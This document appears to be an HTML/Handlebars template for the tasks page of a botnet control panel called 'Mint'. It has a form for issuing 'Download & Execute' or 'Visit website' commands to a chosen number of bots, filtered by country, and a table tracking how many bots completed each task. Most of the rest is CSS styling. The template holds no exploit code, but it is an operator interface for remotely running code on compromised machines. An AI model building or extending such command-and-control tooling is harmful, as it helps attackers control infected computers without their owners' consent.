<!DOCTYPE html>

<html lang="en">

<head>

    <title>Mint</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="description" content="" />
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outlined" rel="stylesheet">
    <link rel="stylesheet" href="/css/global.css">

</head>

<body>
    <div class="dashboard">
        {{> rightmenu}}
        <div class="main">
            <div class="title">
                <h2>Tasks</h2>
            </div>

            <div class="tasks-container">
                <div class="task">
                    <div class="title">
                        <span class="material-icons-outlined">task</span>
                        Tasks
                    </div>
                    {{#if info}}
                    <div class="info">
                        <span class="material-icons-outlined">info</span>
                        {{info}}
                    </div>
                    {{/if}}
                    <form method="post" action="/panel/tasks">
                        <select name="goal" id="goal-select" required>
                            <option value="">Select goal</option>
                            <option value="download_execute">Download & Execute</option>
                            <option value="visit">Visist website</option>
                        </select>
                        <div class="input-group">
                            <input type="text" name="param" id="param" placeholder="URL param" required>
                            <label>Param</label>
                        </div>
                        <div class="input-group">
                            <input type="text" name="targeted" id="targeted" placeholder="Number of bots to target" required>
                            <label>Targeted</label>
                        </div>
                        <div class="input-group">
                            <input type="text" name="countries" id="countries" placeholder="list of countries separated by commas / *." required>
                            <label>Countries</label>
                        </div>
                        <button class="primary">Add Task</button>
                    </form>
                </div>
                <div class="table">
                    <table>
                        <thead>
                            <tr>
                                <td>GOAL</td>
                                <td>PARAM</td>
                                <td>DATE</td>
                                <td>BOTS</td>
                                <td>COMPLETED</td>
                                <td>COUNTRIES</td>
                                <td>DELETE</td>
                            </tr>
                        </thead>
                        <tbody>
                            {{#each tasks}}
                            <tr>
                                <td>{{goal}}</td>
                                <td>{{param}}</td>
                                <td>{{date}}</td>
                                <td>{{targeted}}</td>
                                <td>{{completed}}</td>
                                <td>{{countries}}</td>
                                <td><a href="/delete?id={{id}}"><span class="material-icons-outlined delete">delete</span></a></td>
                            </tr>
                            {{/each}}
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>

    <style>
        /* ==== TASKS ==== */
        .tasks-container {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            margin-top: 1rem;
            width: calc((100% - 22rem));
        }

        .task {
            width: 40rem;
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: var(--background-light);
            gap: 1.2rem;
            padding-bottom: 1rem;
            border-radius: 15px;
            background-color: var(--background-light);
        }

        .task .title {
            padding-top: 1rem;
            margin-left: 1rem;
            font-size: 17px;
            color: #ccc;
            font-weight: 600;
            display: flex;
            align-items: center;
            gap: 1rem;
        }

        .task form {
            width: 90%;
            display: flex;
            align-items: center;
            flex-direction: column;
            gap: 1rem;
        }

        .task form .form-control {
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: space-between;
            padding: 0.3rem;
            width: 100%;
            cursor: pointer;
        }

        .table {
            margin-top: 1rem;
            width: 98%;
        }

        .table table {
            width: 100%;
            border-collapse: collapse;
        }

        .table thead tr {
            display: flex;
            flex-direction: row;
            justify-content: space-between;
            background-color: var(--background-light);
            padding: 10px 15px 10px 15px;
            border-radius: 15px 15px 0px 0px;
        }

        .table thead tr td {
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            gap: 0.6rem;
        }

        .table tbody tr {
            display: flex;
            flex-direction: row;
            justify-content: space-between;
            gap: 1rem;
            padding-top: 0.5rem;
            padding-bottom: 0.5rem;
            background-color: #2B3545;
            letter-spacing: 0.06rem;
            cursor: pointer;
            padding: 10px 15px 10px 15px;
        }

        .table tbody tr:last-child {
            border-radius: 0px 0px 15px 15px;
        }

        .table tbody tr td {
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
        }

        .table .download {
            color: var(--button-text-primary);
            background-color: var(--button-primary);
            padding: 2px;
            border-radius: 10px;
        }

        .info {
            color: var(--warning);
            width: 85%;
            background-color: var(--warning-background);
            padding: 10px;
            border-radius: 15px;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
            gap: 0.5rem;
        }

        /* ==== INPUTS ==== */
        .input-group {
            position: relative;
            display: flex;
            align-items: center;
            width: 100%;
        }

        .input-group input:focus::placeholder {
            color: transparent;
        }

        .input-group:focus-within>label {
            opacity: 100;
            top: -0.5em;
            z-index: 1;
        }

        .input-group input:valid+label {
            opacity: 100;
            top: -0.5em;
            z-index: 1;
        }

        .input-group>label {
            opacity: 0;
            z-index: -1;
            position: absolute;
            top: 0.5em;
            left: 1em;
            transition: all 0.3s ease-in-out;
            padding: 0 0.2em;
            background-color: var(--background-light);
        }

        .input-group input {
            width: 100% !important;
        }

        form input[type="checkbox"] {
            background-color: transparent;
        }

        form input[type="text"] {
            height: 1.8rem;
        }

        form input[type="text"] {
            border: none;
            border: 2px solid var(--font-secondary);
            background: transparent;
            outline: none;
            font-size: 15px;
            padding: 0.3rem;
            border-radius: 15px;
            color: #ccc;
            width: 100%;
            padding-left: 10px;

            transition: all 0.4s ease-in-out;
        }

        form input[type="text"]:focus {
            border: 2px solid var(--font-primary);
        }

        select {
            width: 100%;
            padding: 0.5rem;
            border: 2px solid var(--font-secondary);
            font-size: 15px;
            color: #ccc;
            background-color: var(--background-light);
            border-radius: 10px;
        }

        option {
            font-size: 15px;
            color: var(--font-secondary);
        }

        /* ==== MEDIA QUERY ==== */
        @media (max-width: 850px) {
            .tasks-container {
                width: calc((100% - 5rem));
            }

            .main {
                width: 100% !important;
            }

            .task {
                width: 18rem !important;
            }
        }

        @media (max-width: 1200px) {
            .task {
                width: 25rem;
            }
        }
    </style>

</body>

</html>